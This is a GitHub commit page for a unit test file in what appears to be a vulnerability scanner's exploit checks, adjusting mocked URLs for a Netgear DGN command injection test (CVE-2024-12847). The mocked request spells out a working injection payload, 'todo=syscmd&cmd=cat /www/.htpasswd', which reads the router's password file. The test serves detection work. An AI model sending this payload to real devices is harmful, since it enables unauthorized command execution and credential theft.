Skip to content

Commit

Permalink
Fix Failing Unit tests.
Browse files Browse the repository at this point in the history
  • Loading branch information
nmasdoufi-ol committed Jan 13, 2025
1 parent 61cce1d commit 8dc1826
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions tests/exploits/cve_2024_12847_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -12,12 +12,12 @@ def testNetgearDGNCommandInjection_whenVulnerable_reportFinding(
) -> None:
"""Test case: when target is vulnerable to command injection."""
requests_mock.get(
"http://localhost:80/setup.cgi/",
"http://localhost:80/setup.cgi",
status_code=200,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1",
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%2B%2Fwww%2F.htpasswd&curpath=%2F&currentsetting.htm=1",
text="admin:$1$12345678$ABCDEFGHIJKLMNOPQRSTUVWX",
status_code=200,
)
Expand All @@ -40,12 +40,12 @@ def testNetgearDGNCommandInjection_whenNotNetgear_reportNothing(
) -> None:
"""Test case: when target is not a Netgear device."""
requests_mock.get(
"http://localhost:80/setup.cgi/",
"http://localhost:80/setup.cgi",
status_code=200,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1",
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%2B%2Fwww%2F.htpasswd&curpath=%2F&currentsetting.htm=1",
status_code=401,
)

Expand Down

0 comments on commit 8dc1826

Please sign in to comment.